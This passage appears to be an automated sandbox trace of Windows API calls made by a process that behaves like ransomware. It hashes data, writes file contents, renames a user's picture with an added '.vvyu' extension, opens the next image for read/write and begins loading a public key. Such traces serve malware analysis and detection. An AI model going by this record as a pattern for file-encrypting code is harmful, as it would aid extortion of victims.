hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0190.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0190.382] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0190.382] GetLastError () returned 0x0 [0190.382] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0190.383] CryptReleaseContext (hProv=0x6e9a40, dwFlags=0x0) returned 1 [0190.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0190.383] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0190.383] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0190.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.383] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0190.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xdb80) returned 0x2d45778 [0190.384] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0190.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0190.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0190.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30d00 [0190.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39af0 [0190.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30cb8 [0190.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b08 [0190.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b38 [0190.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b98 [0190.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b50 [0190.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0190.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0190.385] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bd70 [0190.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0190.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b38 | out: hHeap=0x6a0000) returned 1 [0190.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b50 | out: hHeap=0x6a0000) returned 1 [0190.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b98 | out: hHeap=0x6a0000) returned 1 [0190.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0190.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b98 [0190.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0190.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b50 [0190.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0190.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39b38 [0190.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0190.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0190.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0190.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0190.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0190.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0190.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0190.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0190.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b50 | out: hHeap=0x6a0000) returned 1 [0190.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b38 | out: hHeap=0x6a0000) returned 1 [0190.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b98 | out: hHeap=0x6a0000) returned 1 [0190.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0190.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bd70 | out: hHeap=0x6a0000) returned 1 [0190.388] GetCurrentThreadId () returned 0x264 [0190.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0190.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d445a0 [0190.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0190.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0190.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0190.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0190.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0190.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0190.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.389] GetCurrentThreadId () returned 0x264 [0190.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0190.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0190.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82d20 [0190.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0190.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0190.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0190.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b98 [0190.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0190.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0190.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0190.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0190.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0190.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0190.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b38 [0190.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0190.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0190.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0190.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0190.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0190.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b50 [0190.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0190.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0190.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0190.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b20 [0190.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0190.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39bb0 [0190.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0190.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b80 [0190.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b68 [0190.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39bc8 [0190.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b68 | out: hHeap=0x6a0000) returned 1 [0190.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b68 [0190.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b80 | out: hHeap=0x6a0000) returned 1 [0190.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0190.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0190.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0190.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b38 | out: hHeap=0x6a0000) returned 1 [0190.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b38 [0190.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0190.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b98 | out: hHeap=0x6a0000) returned 1 [0190.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0190.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bc8 | out: hHeap=0x6a0000) returned 1 [0190.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0190.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0190.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0190.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b38 | out: hHeap=0x6a0000) returned 1 [0190.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0190.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0190.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0190.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0190.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0190.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0190.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0190.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0190.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0190.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b68 | out: hHeap=0x6a0000) returned 1 [0190.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bb0 | out: hHeap=0x6a0000) returned 1 [0190.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b50 | out: hHeap=0x6a0000) returned 1 [0190.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b20 | out: hHeap=0x6a0000) returned 1 [0190.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0190.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0190.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0190.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b08 | out: hHeap=0x6a0000) returned 1 [0190.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30cb8 | out: hHeap=0x6a0000) returned 1 [0190.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0190.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0190.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0190.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0190.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0190.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0190.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0190.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0190.399] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0xdb7e, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0xdb7e, lpOverlapped=0x0) returned 1 [0190.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0190.400] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xdb83, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.400] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0190.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0190.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0190.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0190.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0190.402] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0190.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.402] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.402] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0190.403] CloseHandle (hObject=0x584) returned 1 [0190.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0190.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d154b0 [0190.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0190.405] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\WajpnYwwAMaGET.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\wajpnywwamaget.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\WajpnYwwAMaGET.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\wajpnywwamaget.bmp.vvyu")) returned 1 [0190.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.407] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea810 | out: hHeap=0x6a0000) returned 1 [0190.410] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59e24170, ftCreationTime.dwHighDateTime=0x1d8a60f, ftLastAccessTime.dwLowDateTime=0xce4c2280, ftLastAccessTime.dwHighDateTime=0x1d8a6e4, ftLastWriteTime.dwLowDateTime=0xce4c2280, ftLastWriteTime.dwHighDateTime=0x1d8a6e4, nFileSizeHigh=0x0, nFileSizeLow=0x5acb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XI5TTs XOUtx12juL.png", cAlternateFileName="XI5TTS~1.PNG")) returned 1 [0190.410] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.410] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea810 [0190.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.410] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\XI5TTs XOUtx12juL.png") returned=".png" [0190.411] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\XI5TTs XOUtx12juL.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\xi5tts xoutx12jul.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.412] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=23243) returned 1 [0190.413] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0190.416] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5aa5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.416] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0190.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.431] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.431] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x5acb, lpOverlapped=0x0) returned 1 [0190.432] lstrlenA (lpString="-----BEGIN PUBLIC 